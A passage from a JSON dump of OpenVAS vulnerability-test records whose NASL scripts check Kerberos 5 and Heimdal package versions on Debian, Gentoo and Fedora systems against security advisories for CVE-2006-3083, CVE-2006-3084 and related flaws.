here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"krb5-doc\", ver:\"1.3.6-2sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-admin-server\", ver:\"1.3.6-2sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-clients\", ver:\"1.3.6-2sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-ftpd\", ver:\"1.3.6-2sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-kdc\", ver:\"1.3.6-2sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-rsh-server\", ver:\"1.3.6-2sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-telnetd\", ver:\"1.3.6-2sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-user\", ver:\"1.3.6-2sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkadm55\", ver:\"1.3.6-2sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrb5-dev\", ver:\"1.3.6-2sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrb53\", ver:\"1.3.6-2sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-doc\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-admin-server\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-clients\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-ftpd\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-kdc\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-rsh-server\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-telnetd\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-user\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkadm55\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrb5-dbg\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrb5-dev\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrb53\", ver:\"1.4.4-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:45", "description": "The remote host is missing updates announced in\nadvisory GLSA 200608-15.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200608-15 (MIT Kerberos 5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:57865", "href": "http://plugins.openvas.org/nasl.php?oid=57865", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Some applications shipped with MIT Kerberos 5 are vulnerable to local\nprivilege escalation.\";\ntag_solution = \"All MIT Kerberos 5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-crypt/mit-krb5-1.4.3-r3'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200608-15\nhttp://bugs.gentoo.org/show_bug.cgi?id=143240\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200608-15.\";\n\n \n\nif(description)\n{\n script_id(57865);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200608-15 (MIT Kerberos 5)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-crypt/mit-krb5\", unaffected: make_list(\"ge 1.4.3-r3\"), vulnerable: make_list(\"lt 1.4.3-r3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:59", "description": "The remote host is missing updates announced in\nadvisory GLSA 200608-21.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200608-21 (Heimdal)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:57871", "href": "http://plugins.openvas.org/nasl.php?oid=57871", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Certain Heimdal components, ftpd and rcp, are vulnerable to a local\nprivilege escalation.\";\ntag_solution = \"All Heimdal users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-crypt/heimdal-0.7.2-r3'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200608-21\nhttp://bugs.gentoo.org/show_bug.cgi?id=143371\nhttp://www.pdc.kth.se/heimdal/advisory/2006-08-08/\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200608-21.\";\n\n \n\nif(description)\n{\n script_id(57871);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200608-21 (Heimdal)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-crypt/heimdal\", unaffected: make_list(\"ge 0.7.2-r3\"), vulnerable: make_list(\"lt 0.7.2-r3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:59", "description": "The remote host is missing an update to krb5\nannounced via advisory DSA 1146-1.\n\nIn certain application programs packaged in the MIT Kerberos 5 source\ndistribution, calls to setuid() and seteuid() are not always checked\nfor success and which may fail with some PAM configurations. A local\nuser could exploit one of these vulnerabilities to result in privilege\nescalation. No exploit code is known to exist at this time.", "cvss3": {}, "published": "2008-01-17T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1146-1 (krb5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:57263", "href": "http://plugins.openvas.org/nasl.php?oid=57263", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1146_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1146-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 1.3.6-2sarge3.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.4.3-9.\n\nWe recommend that you upgrade your krb5 packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201146-1\";\ntag_summary = \"The remote host is missing an update to krb5\nannounced via advisory DSA 1146-1.\n\nIn certain application programs packaged in the MIT Kerberos 5 source\ndistribution, calls to setuid() and seteuid() are not always checked\nfor success and which may fail with some PAM configurations. A local\nuser could exploit one of these vulnerabilities to result in privilege\nescalation. No exploit code is known to exist at this time.\";\n\n\nif(description)\n{\n script_id(57263);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1146-1 (krb5)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"krb5-doc\", ver:\"1.3.6-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-admin-server\", ver:\"1.3.6-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-clients\", ver:\"1.3.6-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-ftpd\", ver:\"1.3.6-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-kdc\", ver:\"1.3.6-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-rsh-server\", ver:\"1.3.6-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-telnetd\", ver:\"1.3.6-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-user\", ver:\"1.3.6-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkadm55\", ver:\"1.3.6-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrb5-dev\", ver:\"1.3.6-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrb53\", ver:\"1.3.6-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:53", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-02-27T00:00:00", "type": "openvas", "title": "Fedora Update for krb5 FEDORA-2007-620", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-2442", "CVE-2007-2798", "CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216", "CVE-2006-3084", "CVE-2007-2443", "CVE-2006-6143"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:861214", "href": "http://plugins.openvas.org/nasl.php?oid=861214", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5 FEDORA-2007-620\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"krb5 on Fedora Core 5\";\ntag_insight = \"Kerberos V5 is a trusted-third-party network authentication system,\n which can improve your network's security by eliminating the insecure\n practice of cleartext passwords.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-June/msg00658.html\");\n script_id(861214);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:31:39 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-620\");\n script_cve_id(\"CVE-2007-2442\", \"CVE-2007-2443\", \"CVE-2007-2798\", \"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\", \"CVE-2006-6143\", \"CVE-2006-3084\");\n script_name( \"Fedora Update for krb5 FEDORA-2007-620\");\n\n script_summary(\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC5\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.4.3~5.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/krb5-debuginfo\", rpm:\"x86_64/debug/krb5-debuginfo~1.4.3~5.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-server\", rpm:\"x86_64/krb5-server~1.4.3~5.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-libs\", rpm:\"x86_64/krb5-libs~1.4.3~5.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-devel\", rpm:\"x86_64/krb5-devel~1.4.3~5.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-workstation\", rpm:\"x86_64/krb5-workstation~1.4.3~5.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-devel\", rpm:\"i386/krb5-devel~1.4.3~5.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-server\", rpm:\"i386/krb5-server~1.4.3~5.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-libs\", rpm:\"i386/krb5-libs~1.4.3~5.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-workstation\", rpm:\"i386/krb5-workstation~1.4.3~5.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/krb5-debuginfo\", rpm:\"i386/debug/krb5-debuginfo~1.4.3~5.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:57", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-02-27T00:00:00", "type": "openvas", "title": "Fedora Update for krb5 FEDORA-2007-0740", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-2442", "CVE-2007-2798", "CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216", "CVE-2007-2443"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:861509", "href": "http://plugins.openvas.org/nasl.php?oid=861509", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5 FEDORA-2007-0740\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"krb5 on Fedora 7\";\ntag_insight = \"Kerberos V5 is a trusted-third-party network authentication system,\n which can improve your network's security by eliminating the insecure\n practice of cleartext passwords.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-June/msg00623.html\");\n script_id(861509);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:31:39 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-0740\");\n script_cve_id(\"CVE-2007-2442\", \"CVE-2007-2443\", \"CVE-2007-2798\", \"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_name( \"Fedora Update for krb5 FEDORA-2007-0740\");\n\n script_summary(\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-debuginfo\", rpm:\"krb5-debuginfo~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server-ldap\", rpm:\"krb5-server-ldap~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-servers\", rpm:\"krb5-workstation-servers~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-libs\", rpm:\"krb5-libs~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-clients\", rpm:\"krb5-workstation-clients~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-libs\", rpm:\"krb5-libs~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-debuginfo\", rpm:\"krb5-debuginfo~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server-ldap\", rpm:\"krb5-server-ldap~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-servers\", rpm:\"krb5-workstation-servers~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation-clients\", rpm:\"krb5-workstation-clients~1.6.1~2.1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:33:23", "description": "Check for the Version of netcdf", "cvss3": {}, "published": "2010-04-30T00:00:00", "type": "openvas", "title": "Mandriva Update for netcdf MDVA-2010:129 (netcdf)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1321", "CVE-2006-3083", "CVE-2006-3084"], "modified": "2017-12-21T00:00:00", "id": "OPENVAS:831019", "href": "http://plugins.openvas.org/nasl.php?oid=831019", "sourceData": 